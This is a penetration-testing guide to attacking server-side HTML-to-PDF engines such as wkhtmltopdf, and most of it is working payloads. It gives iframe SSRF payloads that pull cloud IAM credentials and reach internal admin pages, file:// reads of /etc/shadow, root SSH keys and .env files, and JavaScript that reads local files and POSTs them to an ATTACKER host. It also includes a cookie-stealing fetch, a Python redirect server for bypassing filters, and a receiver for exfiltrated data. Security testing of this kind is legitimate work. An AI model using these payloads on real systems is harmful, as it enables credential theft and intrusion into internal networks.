PDF Generation Vulnerabilities
PDF generation attack surface: SSRF via wkhtmltopdf/DomPDF, LFI via headless browser file:// access, XSS-to-PDF code execution, metadata-based library fingerprinting, and blind detection via Burp Collaborator.
What is the Attack Surface
Web applications that generate PDFs from user-controlled HTML (invoices, reports, certificates) use server-side rendering engines — often a headless browser or HTML-to-PDF library. These engines process HTML including JavaScript, external resources, and local file paths, making them powerful SSRF/LFI vectors.
Common libraries:
| Library | Language | Notes |
|---|---|---|
| wkhtmltopdf | C++ (Qt/WebKit) | Runs JavaScript; most common SSRF target |
| DomPDF | PHP | Limited JS; supports CSS/HTML |
| mPDF | PHP | No JS; text-based |
| html2pdf | PHP/JS | Varies |
| PDFKit / pdfkit | Ruby / Python | Wraps wkhtmltopdf (the Node.js PDFKit is a separate, standalone library) |
| PD4ML | Java | Enterprise use |
| WeasyPrint | Python | CSS-focused |
Detection
Step 1 — Identify PDF generation
Look for features that produce downloadable PDFs from user input:
- Invoice generators
- Report/export buttons
- Certificate generators
- Resume builders
- Any form where your input appears in a PDF output
Step 2 — Fingerprint the library
Download a generated PDF and inspect its metadata:
exiftool invoice.pdf
pdfinfo invoice.pdf
strings invoice.pdf | grep -i "creator\|producer\|wkhtmltopdf\|dompdf"
Look for:
Creator: wkhtmltopdf 0.12.6.1
Producer: Qt 4.8.7
Creator: DomPDF 1.2.0
Producer: dompdf + CPDF
The library name and version tell you which exploits apply.
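When exiftool or pdfinfo is not available, the same fields can often be pulled straight from the file bytes. The following is a minimal sketch, not a full PDF parser: the function name `fingerprint_pdf` is hypothetical, and it assumes the Info dictionary is stored uncompressed with literal `( ... )` strings. Hex strings, object streams, and encrypted files are not handled.

```python
import re

# Matches /Creator (...) or /Producer (...) with a literal PDF string value.
_INFO_RE = re.compile(rb"/(Creator|Producer)\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)


def fingerprint_pdf(data: bytes) -> dict:
    """Return the first Creator/Producer values found in raw PDF bytes."""
    found = {}
    for key, raw in _INFO_RE.findall(data):
        if raw.startswith(b"\xfe\xff"):
            # A UTF-16BE byte order mark marks a Unicode text string.
            text = raw[2:].decode("utf-16-be", errors="replace")
        else:
            text = raw.decode("latin-1")
        # Keep the first occurrence of each key.
        found.setdefault(key.decode("ascii"), text)
    return found
```

Typical use would be `fingerprint_pdf(open("invoice.pdf", "rb").read())`; an empty result means the metadata is stored in a form this sketch does not read, not that the metadata is absent.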
Step 3 — Test for SSRF with Burp Collaborator
Inject an external resource reference into any field that appears in the PDF:
<img src="http://COLLABORATOR_DOMAIN/ssrf_test"/>
<link rel="stylesheet" href="http://COLLABORATOR_DOMAIN/css_test">
<iframe src="http://COLLABORATOR_DOMAIN/iframe_test"></iframe>
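If Burp Collaborator records an HTTP interaction, the PDF engine is fetching external resources and SSRF is confirmed. A DNS-only interaction shows that the hostname was resolved, but not necessarily that the HTTP request left the server.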
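With several input fields in play, it helps to tag each probe so that a callback can be traced back to the field and tag that triggered it. A small sketch of that idea follows; `build_probes` and the example domain are hypothetical names chosen for illustration.

```python
from html import escape
from urllib.parse import quote


def build_probes(collaborator_domain: str, field: str) -> list[str]:
    """Return one probe per tag type; the URL path names the field and tag."""
    # URL-encode the field name so it is safe inside the path.
    base = f"http://{collaborator_domain}/{quote(field, safe='')}"
    return [
        f'<img src="{escape(base)}_img"/>',
        f'<link rel="stylesheet" href="{escape(base)}_css">',
        f'<iframe src="{escape(base)}_iframe"></iframe>',
    ]
```

A callback for `/billing%20name_iframe` would then indicate that the "billing name" field reaches the renderer and that iframes are fetched.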
Exploit 1: SSRF via Resource Tags (wkhtmltopdf)
wkhtmltopdf uses WebKit which fetches all linked resources during rendering.
Image tag SSRF
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
An img request is usually blind: the metadata response is not a valid image, so the PDF shows at most a broken-image placeholder, not the response body. Use an iframe when you need to read the content.
iframe SSRF (reads the response body into the PDF)
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
width="800" height="400"></iframe>
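The iframe content renders inline in the PDF, so the metadata response appears directly in the document. This path lists the attached IAM role name; appending that name to the URL returns the temporary credentials. This works only where IMDSv1 is enabled, because IMDSv2 requires a session token header that a resource tag cannot send.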
Internal service access
<iframe src="http://127.0.0.1:8080/admin"></iframe>
<iframe src="http://internal.company.local/api/users"></iframe>
<iframe src="http://10.0.0.1/router/admin"></iframe>
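When probing several internal targets in one request, labelling each iframe makes it clear which response belongs to which URL in the rendered PDF. A minimal sketch, assuming the injection point accepts a block of HTML; `iframe_sweep` is a hypothetical helper name.

```python
from html import escape


def iframe_sweep(urls, width=800, height=200):
    """Build a labelled iframe for each candidate internal URL."""
    parts = []
    for url in urls:
        safe = escape(url, quote=True)
        # The visible label identifies the target next to its response.
        parts.append(f"<p>{safe}</p>")
        parts.append(
            f'<iframe src="{safe}" width="{width}" height="{height}"></iframe>'
        )
    return "\n".join(parts)
```

For example, `iframe_sweep(["http://127.0.0.1:8080/admin", "http://10.0.0.1/router/admin"])` yields one payload covering both targets.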
Exploit 2: LFI via file:// Protocol
wkhtmltopdf and some other engines support file:// URLs to read local files:
iframe file read
<iframe src="file:///etc/passwd" width="800" height="600"></iframe>
<iframe src="file:///etc/shadow"></iframe>
<iframe src="file:///root/.ssh/id_rsa"></iframe>
<iframe src="file:///var/www/html/.env"></iframe>
<iframe src="file:///proc/self/environ"></iframe>
object/embed tag
<object data="file:///etc/passwd"></object>
<embed src="file:///etc/passwd">
img src for binary detection
<img src="file:///etc/passwd">
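This is a weak signal: a text file cannot render as an image, and a broken-image placeholder can also appear for paths that do not exist. Prefer the iframe or object payloads when you need proof of file access.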
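To check many generated PDFs for a successful read of /etc/passwd, the extracted text (for example from a text-extraction tool run on the PDF) can be scanned for passwd-style lines. The sketch below assumes the text has already been extracted and that each entry survives on a single line; `passwd_entries` is a hypothetical name.

```python
import re

# name:password:uid:gid:... at the start of a line, as in /etc/passwd.
_PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:.*$", re.MULTILINE)


def passwd_entries(text: str) -> list[str]:
    """Return the lines of text that look like /etc/passwd entries."""
    return [m.group(0).strip() for m in _PASSWD_LINE.finditer(text)]
```

A non-empty result is a strong hint that the file was rendered into the document; an empty result may only mean that the text extraction wrapped or reordered the lines.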
Exploit 3: JavaScript-Based LFI (wkhtmltopdf / headless Chrome)
For engines that execute JavaScript:
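<script>
  // Synchronous XHR: the file is read before rendering continues
  var xhr = new XMLHttpRequest();
  xhr.onload = function() {
    // Write the file contents into the page so they appear in the PDF
    document.write('<pre>' + this.responseText + '</pre>');
  };
  xhr.open('GET', 'file:///etc/passwd', false);
  xhr.send();
</script>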
Or exfiltrate via an HTTP request (SSRF + LFI combined):
<script>
  // Step 1: read the local file synchronously
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'file:///etc/passwd', false);
  xhr.send();
  var contents = xhr.responseText;
  // Step 2: POST the base64-encoded contents to the attacker's server
  var exfil = new XMLHttpRequest();
  exfil.open('POST', 'http://ATTACKER/collect', false);
  exfil.send(btoa(contents));
</script>
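On the receiving side, something has to accept the POST and decode the base64 body. A minimal receiver could look like the sketch below; the names `decode_exfil`, `Collect`, and `serve`, and the default port 8000, are assumptions for illustration. The payload's URL must point at whatever port is actually used.

```python
import base64
import http.server


def decode_exfil(body: bytes) -> str:
    """Decode a base64 body as produced by btoa(); tolerate missing padding."""
    body = body.strip()
    body += b"=" * (-len(body) % 4)
    # btoa() encodes one byte per character, so Latin-1 round-trips it.
    return base64.b64decode(body).decode("latin-1")


class Collect(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        # Read exactly the number of bytes the client announced.
        length = int(self.headers.get("Content-Length", 0))
        print(decode_exfil(self.rfile.read(length)))
        self.send_response(204)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Listen on all interfaces and print each decoded POST body."""
    http.server.HTTPServer(("0.0.0.0", port), Collect).serve_forever()
```

Calling `serve()` starts the listener; each incoming POST is decoded and printed to the terminal.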
Exploit 4: XSS Payload in PDF Context
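If the PDF engine runs JavaScript, an injected script executes inside the renderer on the server at generation time (often called server-side XSS), not in the browser of whoever later opens the PDF. Script execution inside a browser-based viewer such as PDF.js is a separate issue that depends on the viewer rather than on this HTML injection. A dialog from alert() leaves nothing in the generated document, so write the value into the page to prove execution:
<script>document.write(document.domain)</script>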
Or inject into a form field that appears verbatim in the PDF:
"><script>fetch('http://ATTACKER/?c='+document.cookie)</script>
Exploit 5: Redirect-Based SSRF Bypass
If the PDF engine follows HTTP redirects, chain an open redirect to reach internal IPs:
<img src="https://TRUSTED_DOMAIN/redirect?url=http://169.254.169.254/latest/meta-data/">
Or host a redirect server:
# Python redirect server
python3 -c "
import http.server
class Redirect(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET with a 302 pointing at the internal target
        self.send_response(302)
        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/')
        self.end_headers()
http.server.HTTPServer(('0.0.0.0', 80), Redirect).serve_forever()
"
Blind PDF Injection (no visible output)
When the PDF is emailed or stored and you can’t see the content directly:
- SSRF confirmation: a Collaborator interaction from any resource tag confirms the engine fetches URLs.
- Exfiltrate via POST: send the file contents to your server from JavaScript (requires an engine that executes JavaScript, such as wkhtmltopdf). XMLHttpRequest is used for both requests because the old WebKit build bundled with wkhtmltopdf does not provide fetch():
<script>
  var x = new XMLHttpRequest();
  x.open('GET', 'file:///etc/passwd', false);
  x.send();
  var out = new XMLHttpRequest();
  out.open('POST', 'http://ATTACKER/lfi', false);
  out.send(btoa(x.responseText));
</script>
- Timing: SSRF to a slow endpoint produces a delayed PDF generation response.
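The timing check is easier to trust when it compares medians over several requests and not a single pair. The sketch below assumes the caller supplies a function that sends one PDF generation request; `median_seconds`, `looks_delayed`, and the two-second threshold are hypothetical choices, not values from any tool.

```python
import statistics
import time


def median_seconds(send, repeats=5):
    """Call send() several times and return the median wall-clock duration."""
    samples = []
    for _ in range(repeats):
        start = time.perf_counter()
        send()
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)


def looks_delayed(baseline, probe, min_extra=2.0):
    """True when the probe took at least min_extra seconds longer."""
    return probe - baseline >= min_extra
```

Measure once with a harmless payload and once with the slow-endpoint payload, then pass both medians to `looks_delayed`. Network jitter can still produce false positives, so repeat the comparison before drawing conclusions.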
Burp Suite workflow
- Proxy: intercept the PDF generation request; find user-controlled fields.
- Repeater: inject <img src="http://COLLABORATOR"> into each field; check Collaborator for callbacks.
- For LFI: inject <iframe src="file:///etc/passwd"> and download/inspect the PDF output.
- Collaborator: confirm SSRF and use it as the exfiltration endpoint for blind scenarios.
- Decoder: base64-decode any exfiltrated file contents from Collaborator HTTP requests.